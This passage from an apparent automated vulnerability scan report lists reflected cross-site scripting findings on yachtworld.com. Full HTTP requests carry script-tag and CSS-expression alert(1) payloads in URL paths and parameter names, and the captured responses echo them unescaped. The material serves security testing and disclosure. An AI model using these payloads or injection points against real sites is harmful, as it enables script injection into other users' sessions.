VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:17 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/builder510ea"><a>6797f0627a5/A-1">
...[SNIP]...

3.295. http://www.yachtworld.com/boats/category/type/builder/model/United+States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bb9"><script>alert(1)</script>020a1d620ff was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/builder/model/United+States68bb9"><script>alert(1)</script>020a1d620ff HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:55:42 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/builder/model/United+States68bb9"><script>alert(1)</script>020a1d620ff/A-1">
...[SNIP]...

3.296. http://www.yachtworld.com/boats/category/type/builder/model/United+States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b56"style%3d"x%3aexpression(alert(1))"f62839a9767 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3b56"style="x:expression(alert(1))"f62839a9767 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States?b3b56"style%3d"x%3aexpression(alert(1))"f62839a9767=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:09 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:16 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>b
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&b3b56"style="x:expression(alert(1))"f62839a9767&seo=true&N=0&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.297. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26141"><script>alert(1)</script>1024af23732 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/builder/model/United+States26141"><script>alert(1)</script>1024af23732/ HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:28 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/builder/model/United+States26141"><script>alert(1)</script>1024af23732/A-1">
...[SNIP]...

3.298. http://www.yachtworld.com/boats/category/type/builder/model/United+States/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 247c8"style%3d"x%3aexpression(alert(1))"0b8bba0dff6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 247c8"style="x:expression(alert(1))"0b8bba0dff6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/?247c8"style%3d"x%3aexpression(alert(1))"0b8bba0dff6=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:06 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>b
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&247c8"style="x:expression(alert(1))"0b8bba0dff6&seo=true&N=0&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.299. http://www.yachtworld.com/boats/category/type/builder/model/United+States/California/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/California/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11882"style%3d"x%3aexpression(alert(1))"554fdc86f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11882"style="x:expression(alert(1))"554fdc86f25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/California/1?11882"style%3d"x%3aexpression(alert(1))"554fdc86f25=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; 